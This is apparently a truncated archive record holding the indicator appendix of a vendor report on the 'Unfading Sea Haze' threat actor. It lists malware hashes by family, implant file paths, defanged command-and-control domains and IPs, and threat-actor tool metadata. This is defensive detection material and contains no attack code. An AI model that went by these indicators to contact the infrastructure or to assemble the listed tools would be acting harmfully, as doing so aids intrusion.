EtherealGh0st\r\n5f8f9269bcd52ef630bc563b83059b77 FluffyGh0st\r\nfa93aec0018c5e3d1d58b76af159bb82 FluffyGh0st\r\n846838327cda19b4415afd5b352c95df EtherealGh0st\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 13 of 18\n\n17303b1a254abb9ed0795f7d9b51b462 FluffyGh0st\r\n3decde2a91f52255dd97eaafc2666947 FluffyGh0st\r\nb98e54d01a094bb6b83eff06a8cf49d6 EtherealGh0st\r\nb1a886f8904d90ad28fce0dc0dc9df93 Ps2dllLoader\r\n5800fff782c36df785dad1d0a34ad418 Ps2dllLoader\r\n4b68c803db1b4222292adba3b2a1a03 EtherealGh0st\r\n6c49738668ca7c054f0708ecc3b626c8 SerialPktDoor loader\r\nd9a452c1c06903fafa4dc4625b2c2d9b EtherealGh0st\r\n91017ad856cff5f0cb304ea2a3ae81c9 FluffyGh0st\r\nf54bed43b372997f3bafe5c67c799e73 InsidiousGh0st\r\ncd0b810751eb2a1470e44f7f6660d5f4 InsidiousGh0st\r\n80fb9865209f8d8d1017c8151c79ef74 Network scanner\r\nc8c890cf8d61cab805e9ef0a4471579a EtherealGh0st\r\n0f4d06cedc93c7784580a3a7c4ad2fb4 InsidiousGh0st\r\nc182b3e659a416fe59f3613c08a8cffb InsidiousGh0st go variant\r\n942086934f4dd65c3e0158c9b8d89933 SharpZulip\r\n124bdaaa70da4daeacbc0513b6c0558e  \r\nFile Paths\r\nc:\\program files\\videolan\\vlc\\msftedit.dll\r\nc:\\programdata\\adobe\\arm\\arm.dll\r\nc:\\programdata\\coint.dll\r\nc:\\programdata\\epson\\setup\\msftedit.dll\r\nc:\\programdata\\microsoft\\devicesync\\msftedit.dll\r\nc:\\programdata\\microsoft\\network\\connections\\winsync.dll\r\nc:\\programdata\\microsoft\\servermanager\\events\\msftedit.dll\r\nc:\\programdata\\microsoft\\windows\\clipsvc\\genuineticket\\msftedit.dll\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 14 of 
18\n\nc:\\programdata\\mscorsvc.dll\r\nc:\\programdata\\mscorsvw.exe\r\nc:\\programdata\\prod.dll\r\nc:\\programdata\\server.dll\r\nc:\\programdata\\ssh\\msftedit.dll\r\nc:\\programdata\\ssh\\setup.exe\r\nc:\\programdata\\ssh\\ssh.sys\r\nc:\\programdata\\stub.ps1\r\nc:\\programdata\\usoshared\\log.dll\r\nc:\\programdata\\usoshared\\logs\\mscorsvc.dll\r\nc:\\programdata\\usoshared\\uso.dll\r\nc:\\programdata\\winsync.dll\r\nc:\\python27\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\adobe\\acrobat\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\comms\\msftedit.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\microsoft\\windows\\caches\\cversions.db\r\nc:\\users\\\u003cuser\u003e\\appdata\\local\\temp\\microsoftupdate.log\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\adobe\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\brother\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\microsoft\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\appdata\\roaming\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\dbghelp.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\gro.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\m.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\mscorsvc.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\mscorsvw.exe\r\nc:\\users\\\u003cuser\u003e\\desktop\\msftedit.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\s.dll\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 15 of 
18\n\nc:\\users\\\u003cuser\u003e\\desktop\\servicemove64.exe\r\nc:\\users\\\u003cuser\u003e\\desktop\\sls\r\nc:\\users\\\u003cuser\u003e\\desktop\\sur.dll\r\nc:\\users\\\u003cuser\u003e\\desktop\\wh.exe\r\nc:\\users\\\u003cuser\u003e\\desktop\\yh.exe\r\nc:\\users\\\u003cuser\u003e\\downloads\\rea.dll\r\nc:\\users\\public\\downloads\\data.dll\r\nc:\\users\\public\\downloads\\mscorsvc.dll\r\nc:\\users\\public\\downloads\\notea.exe\r\nc:\\windows\\addins\\mscorsvc.dll\r\nc:\\windows\\cursors\\curs.cur\r\nc:\\windows\\debug\\wia\\vpn_bridge.config\r\nc:\\windows\\help\\help\\mscorsvc.dll\r\nc:\\windows\\help\\mscorsvc.dll\r\nc:\\windows\\ime\\server.dll\r\nc:\\windows\\livekernelreports\\mscorsvc.dll\r\nc:\\windows\\mscorsvc.dll\r\nc:\\windows\\policydefinitions\\mscorsvc.dll\r\nc:\\windows\\servicestate\\servicestate.dll\r\nc:\\windows\\setup\\cert.dll\r\nc:\\windows\\setup\\mscorsvc.dll\r\nc:\\windows\\system32\\dsc\\msftedit.dll\r\nc:\\windows\\system32\\grouppolicy\\datastore\\0\\sysvol\\\u003cdomain\u003e\\policies\\{31b2f340-016d-11d2-945f-00c04fb984f9}\\machine\\applications.dll\r\nc:\\windows\\system32\\mscorsvc.dll\r\nc:\\windows\\system32\\perceptionsimulation\\hid.dll\r\nc:\\windows\\system32\\perceptionsimulation\\hidserv.dll\r\nc:\\windows\\systemtemp\\mscorsvc.dll\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 16 of 18\n\nc:\\windows\\systemtemp\\winsat\\mscorsvc.dll\r\nem_nqiy9yrk_installer.msi\r\nrecorded.log\r\nDomain 
Names\r\nupupdate.ooguy[.]com\r\nfc.adswt[.]com\r\nmail.simpletra[.]com\r\nmail.adswt[.]com\r\napi.simpletra[.]com\r\nbit.kozow[.]com\r\nbitdefenderupdate[.]org\r\nauth.bitdefenderupdate[.]com\r\nmail.pcygphil[.]com\r\nmail.bomloginset[.]com\r\ndns-log.d-n-s.org[.]uk\r\nlinklab.blinklab[.]com\r\nlink.theworkguyoo[.]com\r\nmail.theworkguyoo[.]com\r\nsopho.kozow[.]com\r\nnews.nevuer[.]com\r\npayroll.mywire[.]org\r\nemployee.mywire[.]org\r\nairst.giize[.]com\r\ncdn.g8z[.]net\r\nmanags.twilightparadox[.]com\r\ndns.g8z[.]net\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 17 of 18\n\nmessage.ooguy[.]com\r\nspcg.lunaticfridge[.]com\r\nhelpdesk.fxnxs[.]com\r\nnewy.hifiliving[.]com\r\nimages.emldn[.]com\r\nword.emldn[.]com\r\nprovider.giize[.]com\r\nrest.redirectme[.]net\r\napi.bitdefenderupdate[.]org\r\nIP Addresses\r\n167.71.199[.]105\r\n188.166.224[.]242\r\n159.223.78[.]147\r\n128.199.166[.]143\r\n164.92.146[.]227\r\n192.153.57[.]24\r\n209.97.167[.]177\r\n112.113.112[.]5\r\n193.149.129[.]128\r\n128.199.66[.]11\r\n45.61.137[.]109\r\n139.59.107[.]49\r\n152.42.198[.]152\r\nSource: https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nhttps://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/\r\nPage 18 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bitdefender.com/blog/businessinsights/deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea/"
	],
	"report_names": [
		"deep-dive-into-unfading-sea-haze-a-new-threat-actor-in-the-south-china-sea"
	],
	"threat_actors": [
		{
			"id": "f51de4ba-d3f5-4df7-ab5a-034b32584e48",
			"created_at": "2024-06-20T02:02:10.208158Z",
			"updated_at": "2026-04-10T02:00:04.960754Z",
			"deleted_at": null,
			"main_name": "Unfading Sea Haze",
			"aliases": [],
			"source_name": "ETDA:Unfading Sea Haze",
			"tools": [
				"DustyExfilTool",
				"EtherealGh0st",
				"FluffyGh0st",
				"InsidiousGh0st",
				"Ps2dllLoader",
				"SerialPktdoor",
				"SharpJSHandler",
				"SharpZulip",
				"SilentGh0st",
				"Stubbedoor",
				"TranslucentGh0st",
				"xkeylog"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cd48e0e6-b206-478d-bcb4-198be54bdf7a",
			"created_at": "2024-06-07T02:00:04.002734Z",
			"updated_at": "2026-04-10T02:00:03.644376Z",
			"deleted_at": null,
			"main_name": "Unfading Sea Haze",
			"aliases": [],
			"source_name": "MISPGALAXY:Unfading Sea Haze",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434426,
	"ts_updated_at": 1775826771,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4c50848a6102d1db0f0955630e8afcff7528c384.pdf",
		"text": "https://archive.orkl.eu/4c50848a6102d1db0f0955630e8afcff7528c384.txt",
		"img": "https://archive.orkl.eu/4c50848a6102d1db0f0955630e8afcff7528c384.jpg"
	}
}